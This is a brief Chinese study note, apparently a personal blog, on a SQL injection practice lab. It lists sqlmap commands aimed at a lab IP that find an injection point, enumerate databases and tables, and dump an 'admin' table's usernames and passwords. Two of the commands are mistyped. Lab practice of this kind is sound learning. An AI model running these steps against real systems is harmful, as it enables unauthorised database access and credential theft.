今天我学习sql注入
掌控安全的封神台是一个很好的在线联系的一个靶场地址
这是其中一个基础的sql注入练习靶场,题目以及告诉我们是使用sql注入了,那么我先使用的sqlmap来进行注入,比较简单,只要记住命令就可以了
首先
sqlmap -u http://59.63.200.79:8003/?id=1
判断是否有注入点,结果很明显,存在注入点
第二部就是查库
sqlmap -u http://59.63.200.79:8003/?id=1 --dbs --batch
dbs 就是库查询,batch就是自动默认选项
不需要太长时间就可以暴库完成,那么这里有几个库,我们关注第二个‘maoshe’
接下来就看看库里面有什么表
sqlmap -u http://59.63.200.79:8003/?id=1 -D maoshe --tables --batch
这个表里面出现了一个我们非常熟悉的东西‘admin’感觉就要成功了,我们进去看看是不是我们需要的
sqlmap -u sqlmap -u http://59.63.200.79:8003/?id=1 -D maoshe -T admin -columns --batch
嗯,有点东西,我们好像找到了我们需要的东西,但是并没有明文密码。接下来就要猜解表了
sqlmap -u sqlmap -u http://59.63.200.79:8003/?id=1 -D maoshe -T admin -C username,password --dump
这里我们成功获取到了明文密码。